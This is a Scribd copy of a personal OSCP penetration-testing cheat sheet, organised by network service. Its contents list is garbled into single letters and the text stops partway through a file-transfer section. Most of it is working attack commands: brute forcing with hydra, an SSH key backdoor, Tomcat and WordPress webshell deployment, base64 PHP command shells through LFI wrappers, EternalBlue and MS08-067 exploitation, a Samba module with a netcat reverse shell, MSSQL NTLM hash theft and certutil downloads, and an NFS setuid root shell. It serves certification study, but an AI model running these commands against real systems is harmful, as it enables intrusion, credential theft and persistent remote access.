Scribd
Upload
82 views

OSCP Personal Cheatsheet: September 18Th, 2020

This document provides a summary of tools and techniques for penetration testing including: port scanning with Nmap, brute forcing common services like SSH, FTP, exploiting vulnerabilities in software like Drupal, WordPress, Joomla, gaining remote access via SMB shares and RDP, and post-exploitation activities like privilege escalation. It covers ports 21-25, 53, 79-80, 110, 139, 443, 1433, 3306, 3389, 5900 and penetration testing methodology for each service.

Uploaded by

mahesh yadav
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
82 views

OSCP Personal Cheatsheet: September 18Th, 2020

This document provides a summary of tools and techniques for penetration testing including: port scanning with Nmap, brute forcing common services like SSH, FTP, exploiting vulnerabilities in software like Drupal, WordPress, Joomla, gaining remote access via SMB shares and RDP, and post-exploitation activities like privilege escalation. It covers ports 21-25, 53, 79-80, 110, 139, 443, 1433, 3306, 3389, 5900 and penetration testing methodology for each service.

Uploaded by

mahesh yadav
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 73

OSCP personal cheatsheet

SEPTEMBER 18TH, 2020


• Enumeration
• NMAP
o TCP
o UDP
• FTP - 21
o Brute
force
o Downlo
ading
file
o Uploadi
ng file
• SSH - 22
o Brute
force
o CVE-
2008-
0166
o SSH
backdo
or - post
exploitat
ion
• DNS - 53
o Zone
transfert
o DNS
brute
force
• FINGER - 79
o User
enumer
ation
o Comma
nd
executio
n
• HTTP - HTTPS
- 80 - 443
o Automat
ic
scanner
s
o Wordpr
ess
▪ W
o
r
d
p
r
e
s
s
p
a
n
e
l
R
C
E
o Drupal
▪ U
s
e
r
n
a
m
e
e
n
u
m
e
r
a
t
i
o
n
▪ H
i
d
d
e
n
p
a
g
e
s
e
n
u
m
e
r
a
t
i
o
n
▪ D
r
u
p
a
l
p
a
n
e
l
R
C
E
o Joomla
o Tomcat
▪ D
e
f
a
u
l
t
c
r
e
d
e
n
t
i
a
l
s
▪ B
r
u
t
e
f
o
r
c
e
▪ T
o
m
c
a
t
p
a
n
e
l
R
C
E
o WebDa
v
o HTTP
brute
force
authenti
cation
▪ H
T
T
P
b
a
s
i
c
a
u
t
h
e
n
t
i
c
a
t
i
o
n
▪ H
T
T
P
G
E
T
r
e
q
u
e
s
t
▪ H
T
T
P
P
O
S
T
r
e
q
u
e
s
t
o Spiderin
g / Brute
force
directori
es / files
▪ F
i
l
e
b
a
c
k
u
p
s
o Local
File
Inclusio
n /
Remote
File
Inclusio
n - LFI /
RFI
▪ W
r
a
p
p
e
r
s
▪ W
r
a
p
p
e
r
p
h
p
:
/
/
f
i
l
t
e
r
▪ W
r
a
p
p
e
r
e
x
p
e
c
t
:
/
/
▪ W
r
a
p
p
e
r
d
a
t
a
:
/
/
▪ W
r
a
p
p
e
r
i
n
p
u
t
:
/
/
▪ U
s
e
f
u
l
L
F
I
l
i
s
t
▪ T
o
o
l
s
o Comma
nd
injection
o Deserial
ization
o File
upload
o SQL
injection
o XSS
o Other
web
vulnera
bilities
o Upload
a file
with
PUT
• KERBEROS -
88
• POP3 - 110
o Brute
force
o Read
mail
• SNMP - 161
o Brute
force
commu
nity
string
o Modifyin
g SNMP
values
• LDAP - 389
o Scans
o Graphic
al
Interfac
e
• SMB - 445
o Version
if nmap
didn’t
detect it
o Scan for
vulnera
bility
o Manual
testing
o Brute
force
o Mount a
SMB
share
o Get a
shell
o Eternal
Blue
(MS17-
010)
▪ C
h
e
c
k
i
f
v
u
l
n
e
r
a
b
l
e
▪ P
r
e
p
a
r
e
s
h
e
l
l
c
o
d
e
s
a
n
d
l
i
s
t
e
n
e
r
s
▪ E
x
p
l
o
i
t
▪ I
f
t
h
i
s
d
o
e
s
n

t
w
o
r
k
,
t
r
y
t
h
i
s
o
n
e
o MS08-
067
o CVE-
2017-
7494
• MSSQL - 1433
o Get
informat
ion
o Brute
force
o Having
credenti
als
o Manual
exploit
• NFS - 2049
o Show
Mounta
ble NFS
Shares
o Mount a
share
o NFS
misconfi
guration
s
• MYSQL - 3306
o Brute
force
o Extracti
ng
MySQL
credenti
als from
files
o Connect
o MySQL
comma
nds
o Manual
exploit
• RDP - 3389
o Brute
force
o Connect
with
known
credenti
als /
hash
o Session
stealing
▪ G
e
t
o
p
e
n
n
e
d
s
e
s
s
i
o
n
s
▪ A
c
c
e
s
s
t
o
t
h
e
s
e
l
e
c
t
e
d
o Adding
user to
RDP
group
(Windo
ws)
• VNC - 5800 -
58001 - 5900 -
5901
o Scans
o Brute
force
o Connect
o Found
VNC
passwor
d
▪ L
i
n
u
x
▪ W
i
n
d
o
w
s
o Decrypt
VNC
passwor
d
• WINRM - 5985 -
5986
o Brute
force
o Connect
ing
• CGI
o Found
CGI
scripts
• Command and
control
framework
• Compiling
exploits
o For
linux
o For
window
s
o Cross
compile
• DICTIONARY
GENERATION
• FILE
TRANSFER
o Linux
o Window
s
• GIT
o Downlo
ad .git
o Extract
.git
content
• HASHES
o Window
s
o Linux
• MIMIKATZ
• MISCELLANEO
US
o Get a
Window
s path
without
spaces
• MSFVENOM
PAYLOAD
o Linux
o Window
s
o PHP
o ASP
o JSP
o WAR
o Python
o Bash
o Perl
o Listener
▪ M
e
t
a
s
p
l
o
i
t
▪ N
e
t
c
a
t
• PASSWORD
CRACKING
o Online
o Hashcat
▪ L
i
n
u
x
p
a
s
s
w
o
r
d
▪ W
i
n
d
o
w
s
p
a
s
s
w
o
r
d
▪ O
t
h
e
r
s
▪ R
u
l
e
s
o John
• PIVOTING
o Sshuttle
o Proxych
ains
• PRIVILE
ESCALATION
o Linux
▪ E
n
u
m
e
r
a
t
i
o
n
s
c
r
i
p
t
s
▪ V
u
l
n
e
r
a
b
i
l
i
t
y
s
c
a
n
▪ S
u
i
d
c
h
e
c
k
e
r
▪ M
e
t
h
o
d
o
l
o
g
y
t
o
f
o
l
l
o
w
o Window
s
▪ E
n
u
m
e
r
a
t
i
o
n
s
c
r
i
p
t
s
▪ G
e
n
e
r
a
l
s
c
a
n
s
▪ S
e
a
r
c
h
f
o
r
C
V
E
▪ P
o
s
t
e
x
p
l
o
i
t
a
t
i
o
n
▪ J
u
i
c
y
P
o
t
a
t
o
(
S
e
I
m
p
e
r
s
o
n
a
t
e
o
r
S
e
A
s
s
i
g
n
P
r
i
m
a
r
y
T
o
k
e
n
)
▪ M
e
t
h
o
d
o
l
o
g
y
t
o
f
o
l
l
o
w
▪ A
u
t
o
r
u
n
▪ D
e
t
e
c
t
i
o
n
▪ E
x
p
l
o
i
t
a
t
i
o
n
▪ A
l
w
a
y
s
I
n
s
t
a
l
l
E
l
e
v
a
t
e
d
▪ D
e
t
e
c
t
i
o
n
▪ E
x
p
l
o
i
t
a
t
i
o
n
▪ E
x
e
c
u
t
a
b
l
e
F
i
l
e
s
▪ D
e
t
e
c
t
i
o
n
▪ E
x
p
l
o
i
t
a
t
i
o
n
▪ S
t
a
r
t
u
p
a
p
p
l
i
c
a
t
i
o
n
s
▪ D
e
t
e
c
t
i
o
n
▪ E
x
p
l
o
i
t
a
t
i
o
n
▪ W
e
a
k
s
e
r
v
i
c
e
p
e
r
m
i
s
s
i
o
n
▪ D
e
t
e
c
t
i
o
n
▪ E
x
p
l
o
i
t
a
t
i
o
n
▪ U
n
q
u
o
t
e
d
s
e
r
v
i
c
e
p
a
t
h
s
▪ D
e
t
e
c
t
i
o
n
▪ E
x
p
l
o
i
t
a
t
i
o
n
▪ H
o
t
p
o
t
a
t
o
▪ E
x
p
l
o
i
t
a
t
i
o
n
▪ C
V
E
▪ W
i
n
d
o
w
s
X
P
▪ W
i
n
d
o
w
s
7
▪ W
i
n
d
o
w
s
8
▪ W
i
n
d
o
w
s
1
0
▪ W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
3
• PROOFS
o Linux
o Window
s
• REVERSE
SHELL
o Amazin
g tool
for shell
generati
on
o Bash
o Perl
o Python
o Netcat
o More
reverse
shell
o Interacti
ve shell
o Adjust
Interacti
ve shell
• SHELLSHOCK
• USEFUL LINUX
COMMANDS
o Find a
file
o
Active
connecti
on
o List all
SUID
files
o Determi
ne the
current
version
of Linux
o Determi
ne more
informat
ion
about
the
environ
ment
o List
process
es
running
o List the
allowed
(and
forbidde
n)
comma
nds for
the
invoking
use
• USEFUL
WINDOWS
COMMANDS
• ZIP

Enumeration
nmap -sn -v <IP>/CIDR
nmapAutomator <IP> All
autorecon <IP>/CIDR
NMAP
TCP
sudo -sS -sC -sV -oA <NAME>.tcp <IP> -v

UDP
sudo -sU -sS -sC -sV -oA <NAME>.udp <IP> -v

FTP - 21
Brute force
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ftp://<IP> -u -vV

Downloading file
ftp <IP>
PASSIVE
BINARY
get <FILE>

Uploading file
ftp <IP>
PASSIVE
BINARY
put <FILE>

SSH - 22
Brute force
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ssh://<IP> -u -vV

CVE-2008-0166
All SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc) between
September 2006 and May 13th, 2008 may be affected.

https://www.exploit-db.com/exploits/5720

wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048
_x86.tar.bz2 https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_
dsa_1024_x86.tar.bz2

bunzip2 debian_ssh_rsa_2048_x86.tar.bz2 debian_ssh_dsa_1024_x86.tar.bz2


tar -xvf debian_ssh_rsa_2048_x86.tar
tar -xvf debian_ssh_dsa_1024_x86.tar

python 5720 rsa/2048 <IP> <USER> <PORT> <THREADS>


python 5720 dsa/1024 <IP> <USER> <PORT> <THREADS>

SSH backdoor - post exploitation


# Attacker
ssh-keygen -f <FILENAME>
chmod 600 <FILENAME>
cat <FILENAME>.pub -> copy

# Victim
echo <FILENAME>.pub >> <PATH>/.ssh/authorized_keys

# Connect
ssh -i <FILENAME> <USER>@<IP>
DNS - 53
dnsenum <DOMAIN>
dnsrecon -d <DOMAIN>

Zone transfert
dnsrecon -d <DOMAIN> -a
dig axfr <DOMAIN> @ns1.test.com

DNS brute force


https://github.com/blark/aiodnsbrute

FINGER - 79
User enumeration
finger @<IP>
finger <USER>@<IP>

Command execution
finger "|/bin/id@<IP>"
finger "|/bin/ls -a /<IP>"

HTTP - HTTPS - 80 - 443


Automatic scanners
nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 2
0

Wordpress
# Scan
wpscan --rua -e --url <URL>

# Brute force user(s)


wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"

Wordpress panel RCE

Modifying a php from the theme used (admin credentials needed)

Appearance -> Editor -> 404 Template (at the right)


Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.php

Drupal
droopescan scan -u <URL>

Username enumeration
In /user/register just try to create a username and if the name is already taken it w
ill be notified :
*The name admin is already taken*

If you request a new password for an existing username :


*Unable to send e-mail. Contact the site administrator if the problem persists.*

If you request a new password for a non-existent username :


*Sorry, test is not recognized as a user name or an e-mail address.*

Accessing /user/<number> you can see the number of existing users :


- /user/1 -> Access denied (user exist)
- /user/2 -> Page not found (user doesn't exist)

Hidden pages enumeration


Fuzz /node/<NUMBER> where <NUMBER> is a number (from 1 to 500 for example).
You could find hidden pages (test, dev) which are not referenced by the search engine
s.

wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZ

Drupal panel RCE


You need the plugin php to be installed (check it accessing to /modules/php and if it
returns a 403 then, exists, if not found, then the plugin php isn't installed)

Go to Modules -> (Check) PHP Filter -> Save configuration

https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php

Then click on Add content -> Select Basic Page or Article -> Write php shellcode on t
he body -> Select PHP code in Text format -> Select Preview

Joomla
joomscan -u <URL>
./joomlavs.rb --url <URL> -a -v

Tomcat
Default credentials
The most interesting path of Tomcat is /manager/html, inside that path you can upload
and deploy war files (execute code). But this path is protected by basic HTTP auth,
the most common credentials are :

admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u

Tomcat panel RCE


# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# Upload payload
Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shel
l' -O -

Tomcat7 and above :


curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=
/shellh&update=true'

# Listener
nc -lvp <PORT>

# Execute payload
curl http://<IP>:8080/shell/

WebDav
davtest -url <URL>

HTTP brute force authentication


HTTP basic authentication

# Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15
# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWOR
D_LIST> -x ignore:code=401 -x ignore:code=307

HTTP GET request


hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&pa
ssword=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUM
BER>

HTTP POST request


hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^
USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>

Spidering / Brute force directories / files


gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.


txt -t <THREADS>
dirbuster

Dictionaries :
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

File backups
Once you have found all the files, look for backups of all the executable files (“.php”, “.aspx“…).
Common variations for naming a backup are

file.ext~, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old

Local File Inclusion / Remote File Inclusion - LFI / RFI


https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

Wrappers
Wrapper php://filter

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=

Wrapper expect://

http://example.com/index.php?page=expect://id

Wrapper data://

echo '<?php phpinfo(); ?>' | base64 -w0 -> PD9waHAgcGhwaW5mbygpOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg
o=

If code execution, you should see phpinfo(), go to the disable_functions and craft a
payload with functions which aren't disable.

Code execution with


- exec
- shell_exec
- system
- passthru
- popen

# Exemple
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0 -> PD9waHAgc
GFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRV
RbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

If there is "Shell done !" on the webpage, then there is code execution and you can d
o things like :

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRV
RbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls

Wrapper input://
curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_e
xec('id'); ?>"

Useful LFI list

# Linux
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

# Windows
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

# Both
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt

Tools
kadimus --url <URL>
python lfisuite.py

Command injection
For command injection always use BurpSuite !

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Deserialization
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Deserializ
ation

File upload
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20F
iles

SQL injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://cobalt.io/blog/a-pentesters-guide-to-sql-injection-sqli

XSS
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

beef-xss
cat /usr/share/beef-xss/config.yaml | grep user -C 1 # user / password
<script src="http://<IP>:3000/hook.js"></script>

Other web vulnerabilities


https://github.com/swisskyrepo/PayloadsAllTheThings

Upload a file with PUT


curl -X PUT http://<IP>/<FILE> -d @<FILE> -v

KERBEROS - 88
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

POP3 - 110
Brute force
hydra -l <USER> -P <PASSWORDS_LIST> -f <IP> pop3 -V
hydra -S -v -l <USER> -P <PASSWORDS_LIST> -s 995 -f <IP> pop3 -V

Read mail
telnet <IP> 110
USER <USER>
PASS <PASSWORD>
LIST
RETR <MAIL_NUMBER>
QUIT

SNMP - 161
Brute force community string
onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-s
trings-onesixtyone.txt <IP>
snmpbulkwalk -c <COMMUNITY_STRING> -v<VERSION> <IP>
snmp-check <IP>

Modifying SNMP values


http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html

LDAP - 389
Scans
nmap -n -sV --script "ldap* and not brute"

ldapsearch -h <IP> -x -s base


ldapsearch -h <IP> -x -D '<DOMAIN>\<USER>' -w '<PASSWORD>' -b "DC=<1_SUBDOMAIN>,DC=<T
DL>"

Graphical Interface
jxplorer

SMB - 445
Version if nmap didn’t detect it
Sometimes nmap doesn’t show the version of Samba in the remote host, if this happens,
a good way to know which version the remote host is running, is to capture traffic wi
th wireshark against the remote host on 445/139 and in parallel run an smbclient -L,
do a follow tcp stream and with this we might see which version the server is running
.

OR

sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139


smbclient -L <IP>

Scan for vulnerability


nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-v
uln-cve-2017-7494.check-version,unsafe=1 <IP>

If :

• MS17-010
- EternalBlue
• MS08-067
- MS08-067
• CVE-2017-
7494 - CVE-
2017-7494

Manual testing
smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '' -p '' -H <IP> -R
crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '' -p '' --shares

enum4linux -a <IP>

smbclient --no-pass -L //$IP


smbclient //<IP>/<SHARE>

# Download all files from a directory recursively


smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *"

Brute force
crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV

Mount a SMB share


mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>'//<IP>/<SHARE> /tmp/share

smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER>

Get a shell
psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP> <COMMAND>


atexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

EternalBlue (MS17-010)
https://github.com/3ndG4me/AutoBlue-MS17-010

Check if vulnerable
python eternal_checker.py <IP>

Prepare shellcodes and listeners


cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh

Exploit
python eternalblue_exploit<NUMBER>.py <IP> shellcode/sc_all.bin

May need to run it multiple times

If this doesn’t work, try this one

python zzz_exploit.py <IP>

MS08-067
# Download exploit code
git clone https://github.com/andyacer/ms08_067.git

# Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x0
0\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x
0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

# Modify
Modify ms08_067_2018.py and replace the shellcode variable by the one generated with
msfvenom.

# Listener
nc -lvp <PORT>

# Exploit
python ms08_067_2018.py <IP> <NUMBER> 445

CVE-2017-7494
# Download exploit code
git clone https://github.com/joxeankoret/CVE-2017-7494

Create a new file named poc.c :

#include <stdio.h>
#include <stdlib.h>

int samba_init_module(void)
{
setresuid(0,0,0);
system("ping -c 3 <IP>");
}
# Build
gcc -o test.so -shared poc.c -fPIC
# Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp

# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so

If you reiceve 3 pings on your listener then the exploit works. Now let’s get a shell :

#include <stdio.h>
#include <stdlib.h>

int samba_init_module(void)
{
setresuid(0,0,0);
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
}
# Build
gcc -o test.so -shared poc.c -fPIC
# Start a listener
nc -lvp <PORT>

# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so

MSSQL - 1433
Get information
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-s
ql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-
args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=M
SSQLSERVER -sV -p 1433 <IP>

Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u

Having credentials
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>

# Once logged in you can run queries:


SQL> select @@ version;

# Steal NTLM hash


sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\<IP>\liodeus\' # Steal the NTLM hash, crack it with j
ohn or hashcat

# Try to enable code execution


SQL> enable_xp_cmdshell

# Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exe

Manual exploit
Cheatsheet :
- https://www.asafety.fr/mssql-injection-cheat-sheet/

NFS - 2049
Show Mountable NFS Shares
showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>

Mount a share
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>

NFS misconfigurations
# List exported shares
cat /etc/exports

If you find some directory that is configured as no_root_squash/no_all_squash you may be able to
privesc.

# Attacker, as root user

mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn

# Victim

cd <SHARE>
./pwn # Root shell

MYSQL - 3306
Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u

Extracting MySQL credentials from files


cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_
password"
Connect
# Local
mysql -u <USER>
mysql -u <USER> -p

# Remote
mysql -h <IP> -u <USER>

MySQL commands
show databases;
use <DATABASES>;

show tables;
describe <TABLE>;

select * from <TABLE>;

# Try to execute code


select do_system('id');
\! sh

# Read & Write


select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>'

Manual exploit
Cheatsheet :
- https://www.asafety.fr/mysql-injection-cheat-sheet/
RDP - 3389
Brute force
crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>

hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV

Connect with known credentials / hash


rdesktop -u <USERNAME> <IP>
rdesktop -d <DOMAIN> -u <USERNAME> -p <PASSWORD> <IP>

xfreerdp /u:[DOMAIN\]<USERNAME> /p:<PASSWORD> /v:<IP>


xfreerdp /u:[DOMAIN\]<USERNAME> /pth:<HASH> /v:<IP>

Session stealing
Get openned sessions

query user

Access to the selected


tscon <ID> /dest:<SESSIONNAME>

Adding user to RDP group (Windows)


net localgroup "Remote Desktop Users" <USER> /add

VNC - 5800 - 58001 - 5900 - 5901


Scans
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p <PORT> <IP>

Brute force
hydra -L <USERS_LIST> –P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV

Connect
vncviewer <IP>:<PORT>

Found VNC password


Linux
Default password is stored in: ~/.vnc/passwd

Windows
# RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver

# TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server

# TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4

# UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini

Decrypt VNC password


msfconsole
irb
fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
require 'rex/proto/rfb'
Rex::Proto::RFB::Cipher.decrypt ["2151D3722874AD0C"].pack('H*'), fixedkey
/dev/nul

WINRM - 5985 - 5986


Brute force
crackmapexec winrm <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>

Connecting
evil-winrm -i <IP> -u <USER> -p <PASSWORD>
evil-winrm -i <IP> -u <USER> -H <HASH>

CGI
Found CGI scripts
ffuf -w /home/liodeus/wordlist/SecLists/Discovery/Web-Content/CGI-XPlatform.fuzz.txt
-u <URL>/ccgi-bin/FUZZ -t 50
ffuf -w /home/liodeus/wordlist/SecLists/Discovery/Web-Content/CGIs.txt -u <URL>/ccgi-
bin/FUZZ -t 50
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/cgi-bin/FUZZ -
e .sh,.pl,.cgi -t 100

If a script is found try SHELLSHOCK.

Command and control framework


# Download
git clone https://github.com/mhaskar/Octopus/tree/v1.2
# Install requirements
pip install -r requirements.txt

# Usage
./octopus.py

# Listener (exemple)
listen_http <BIND_IP> <BIND_PORT> <HOSTNAME> <INTERVAL_IN_SECONDS> <URL> <LISTENER_NA
ME>
listen_http 0.0.0.0 80 192.168.1.87 5 test.php listener_1

# Agent (exemple)
generate_powershell <LISTENER_NAME>
generate_powershell listener_1

Compiling exploits
For linux
# 64 bits
gcc -o exploit exploit.c

# 32 bits
gcc -m32 -o exploit exploit.c

For windows
To compile Win32 bit executables, execute i686-w64-mingw32-gcc -o <FILE.exe> <FILE.c>
To compile Win64 bit executables, execute x86_64-w64-mingw32-gcc -o <FILE.exe><FILE.c
>
To Compiled .cpp source file, execute i586-mingw32msvc-g++ -o <FILE>.exe <FILE>.cpp
To compile python scripts, pyinstaller --onefile <SCRIPT.py>

# Compile windows .exe on Linux


i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Cross compile
gcc -m32 -Wall -Wl,--hash-style=both -o gimme.o gimme.c

DICTIONARY GENERATION
cewl -m <WORDS_SIZE> --with-numbers -w dictiFromWebsite <URL> -d <DEPTH>
crunch 5 5 -f /usr/share/crunch/charset.lst mixalpha-numeric-all -t Test@ -o password
s.txt

FILE TRANSFER
Linux
# PYTHON
python -m SimpleHTTPServer <PORT>
python2.7 -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE
>')"

# FTP
sudo python3 -m pyftpdlib -p 21 -w

# SMB
sudo smbserver.py -smb2support liodeus .

# WGET
wget <URL> -o <OUT_FILE>

# CURL
curl <URL> -o <OUT_FILE>
# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>

# SCP
scp <SOURCE_FILE> <USER>@<IP>:<DESTINATION_FILE>

Windows
# FTP
